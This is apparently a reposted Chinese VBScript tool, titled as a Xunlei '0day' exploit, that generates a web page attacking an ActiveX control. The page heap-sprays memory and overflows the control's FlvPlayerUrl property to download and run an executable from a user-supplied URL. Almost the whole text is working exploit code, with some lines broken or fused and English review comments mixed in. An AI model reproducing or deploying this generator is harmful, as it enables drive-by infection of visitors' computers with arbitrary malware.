
[vbs也写EXP]xunlei_0day_exp

来源:vbs空间

' Prompts for a URL (a default is pre-filled) and, if one was entered,
' writes netpatch.htm in the current directory.
exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http//np.icehack.com/np.exe" )
code by NetPatch
if exeurl <> "" then
' The shellcode literal was stripped from this copy of the page.
code="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"
' The URL followed by a NUL terminator.
down=exeurl&Chr(00)
' Unicode: converts each character of str1 into "x" followed by two hex
' digits (no backslash is emitted). AscW yields a UTF-16 code unit, but
' right(...,2) keeps only its low byte, so characters above &HFF are
' truncated. The result is consumed by replaceregex below.
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
' Zero-pad to two digits; len(temp) < 5 is always true for Hex() of a
' 16-bit value, so the pad-then-truncate always applies.
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "x" & temp
Next
Unicode = str
End Function
' replaceregex: rewrites each "xAAxBB" pair into "%uBBAA" (bytes swapped),
' the %u form that JavaScript unescape() accepts.
' NOTE(review): the pattern's \x is not followed by hex digits, so it
' appears to match a literal "x" (the prefix Unicode() emits) — confirm.
function replaceregex(str)
set regex=new regExp
regex.pattern="\x(..)\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
' Emits netpatch.htm (opened for append, created if absent). The page
' embeds the ActiveX control with the CLSID below, assigns a long string
' to its FlvPlayerUrl property and uses the say_hello cookie to reload
' once. For detection, the fixed CLSID, the cookie name and the long runs
' of %u escapes are the stable artifacts of pages produced by this script.
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)

fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var expires = new Date();"
fileS.writeline "expires.setTime(expires.getTime() + 0 * 0 * 1 * 1000);"
fileS.writeline "var set_cookie = document.cookie.indexOf(""say_hello=""); "
fileS.writeline "if (set_cookie == -1){document.cookie = ""say_hello=1;expires="" + expires.toGMTString();"
fileS.writeline "document.write(<object id=""gl"" classid=""clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F""></object>);"
fileS.writeline "var helloworld2Address = 0x0c0c0c0c;"
fileS.writeline "var shellcode = unescape("""&replaceregex(code&Unicode(down))&""");"
fileS.writeline "var hbshelloworld = 0x100000;"
fileS.writeline "var payLoadSize = shellcode.length * 2;"
fileS.writeline "var spraySlideSize = hbshelloworld - (payLoadSize+0x38);"
fileS.writeline "var spraySlide = unescape(""%u0c0c%u0c0c"");"
fileS.writeline "spraySlide = getSpraySlide(spraySlide,spraySlideSize);"
fileS.writeline "heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (i=0;i<heapBlocks;i++)"
fileS.writeline "{"
fileS.writeline " memory[i] = spraySlide + shellcode;"
fileS.writeline "}"
fileS.writeline "function getSpraySlide(spraySlide, spraySlideSize)"
fileS.writeline "{"
fileS.writeline "while (spraySlide.length*2<spraySlideSize)"
fileS.writeline "{"
fileS.writeline " spraySlide += spraySlide;"
fileS.writeline "}"
fileS.writeline "spraySlide = spraySlide.substring(0,spraySlideSize/2);"
fileS.writeline "return spraySlide;"
fileS.writeline "}"
fileS.writeline "var size_buff = 1070;"
fileS.writeline "var x = unescape(""%0c%0c%0c%0c"");"
fileS.writeline "while (x.length<size_buff) x += x;"
fileS.writeline "gl.FlvPlayerUrl = x;"
fileS.writeline "}"
fileS.writeline "</SCRIPT>"
fileS.writeline "<script>"
fileS.writeline "if (set_cookie == -1){"
fileS.writeline "location.reload();"
fileS.writeline "}"
fileS.writeline "</script>"files.Close
' "files.Close" above was fused onto the preceding writeline by extraction.
Set fso=nothing
msgbox "生成完毕!"
end if
